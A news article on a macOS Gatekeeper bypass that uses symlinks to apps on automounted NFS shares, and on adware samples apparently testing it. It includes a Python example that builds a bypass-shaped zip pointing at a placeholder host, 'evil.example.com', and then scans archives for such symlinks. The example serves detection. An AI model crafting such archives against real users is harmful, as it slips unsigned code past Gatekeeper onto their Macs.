A macOS Gatekeeper vulnerability discovered by a security researcher last month has now been exploited in what appears to be a test by an adware company.

Gatekeeper is designed to ensure that Mac apps downloaded from the internet are legitimate by checking that the code was signed with a valid Apple-issued Developer ID certificate (or came from the Mac App Store). Any app failing that check shouldn’t be allowed to open without the user acknowledging the risk and granting explicit permission to proceed.

However, security researcher Filippo Cavallarin last month drew attention to a gap in this. Gatekeeper treats external drives and network shares as trusted locations and lets apps open from them without the check, and the macOS automount feature will mount an NFS share the first time a path under /net/ is accessed. An attacker can therefore package a symlink that points to an app on an NFS server they control; when the user opens it, the unsigned app runs from the share with no warning.

So a file that passes through Gatekeeper can be used to launch unsigned code that never goes through it.

Cavallarin acted responsibly in giving Apple 90 days to fix the vulnerability before disclosing it, but says that the company failed to do so and stopped responding to his emails.

The exploitation of the macOS Gatekeeper vulnerability

Security company Intego now says that it has discovered an example of this vulnerability being exploited, seemingly as a test by an adware company.

Cavallarin’s proof of concept delivered the symlink inside a zip file; the samples Intego found instead packaged it in a disk image.
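The zip and disk image variants both come down to the same thing: an archive entry that is a symlink whose target lives on an automounted network share, so the code that actually runs is never inside the file Gatekeeper looked at. The following Python is an added example written for this page, not code from the article, Cavallarin or Intego. It first constructs an archive of the kind the bypass uses (the hostname evil.example.com and share name are made up) and then scans it the way a defender might: any symlink entry whose target resolves under /net/ or /Volumes/, or otherwise escapes the extraction directory, is flagged. A benign relative symlink is included to show it is not flagged.

```python
"""Scan a zip archive for symlink entries that point outside the archive,
in particular at macOS automount (/net/) or external-volume (/Volumes/)
paths, which is the vector Cavallarin's Gatekeeper bypass relies on.
Added example for this page; hostnames and share names are invented."""
import io
import stat
import zipfile

# Path prefixes that macOS resolves to network shares or external volumes,
# which Gatekeeper treats as trusted locations.
AUTOMOUNT_PREFIXES = ("/net/", "/Volumes/")


def build_sample_zip():
    """Construct an archive shaped like the bypass: a harmless text file plus
    a symlink whose target is an app on an NFS share reached via automount.
    The host evil.example.com is hypothetical."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "Drag the app to Applications\n")

        # A benign relative symlink, to show the scanner leaves it alone.
        readme_link = zipfile.ZipInfo("Readme.lnk")
        readme_link.create_system = 3  # UNIX
        readme_link.external_attr = (stat.S_IFLNK | 0o755) << 16
        zf.writestr(readme_link, "README.txt")

        # The malicious entry. In the zip format a symlink is stored as a
        # file whose mode (high 16 bits of external_attr) has S_IFLNK set and
        # whose data is the link target. Unzipping it on macOS creates a
        # symlink named Install.app that resolves through automount.
        evil = zipfile.ZipInfo("Install.app")
        evil.create_system = 3
        evil.external_attr = (stat.S_IFLNK | 0o755) << 16
        zf.writestr(evil, "/net/evil.example.com/share/Install.app")
    return buf.getvalue()


def classify_target(target):
    """Return a reason string if a symlink target is suspicious, else None."""
    if target.startswith(AUTOMOUNT_PREFIXES):
        return "automount or external volume"
    if target.startswith("/"):
        return "absolute path outside archive"
    if ".." in target.split("/"):
        return "escapes extraction directory"
    return None


def find_suspicious_symlinks(zip_bytes):
    """Return (entry name, target, reason) for every suspicious symlink entry.
    Regular files and relative symlinks that stay inside the archive are
    ignored."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            reason = classify_target(target)
            if reason is not None:
                hits.append((info.filename, target, reason))
    return hits


if __name__ == "__main__":
    for name, target, reason in find_suspicious_symlinks(build_sample_zip()):
        print(f"{name} -> {target}  [{reason}]")
```

The same check applies to a mounted disk image: walk the volume with `os.walk(followlinks=False)`, call `os.readlink` on each symlink, and pass the result to `classify_target`. Note that the scan only sees the pointer; the payload itself sits on the attacker’s server and can be changed after the archive has been inspected.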

Identifying the culprit

Intego says there is good reason to suspect the test was performed by the developers of the OSX/Surfbuyer adware.

The disk image files were either an ISO 9660 image with a .dmg file name, or an actual Apple Disk Image format .dmg file, depending on the sample. Normally, an ISO image has a .iso or .cdr file name extension, but .dmg (Apple Disk Image) files are much more commonly used to distribute Mac software. (Incidentally, several other Mac malware samples have recently been using the ISO format, possibly in a weak attempt to avoid detection by anti-malware software.)

Intego observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image, that all linked to one particular application on an Internet-accessible NFS server.

The company says the sample did nothing beyond creating a temporary text file, which lends weight to the idea that this was just a test. The files have since been removed from the server, but that could quickly change: because the symlink points at a server the attacker controls, a live payload can be swapped in at any time without touching the disk image itself.

Intego has reported the Apple Developer ID to Apple so that the company can revoke the certificate.

As always, best practice is to download apps only from the Mac App Store and from sources you explicitly trust, bearing in mind that this vulnerability lets a bad actor hide malware in an otherwise ordinary-looking archive or disk image, with the payload fetched from the attacker’s server at the moment you open it. Until Apple ships a fix, the workaround Cavallarin published with his advisory is to disable automount by commenting out the line beginning with /net in /etc/auto_master and rebooting, which removes the network-share path the bypass depends on.
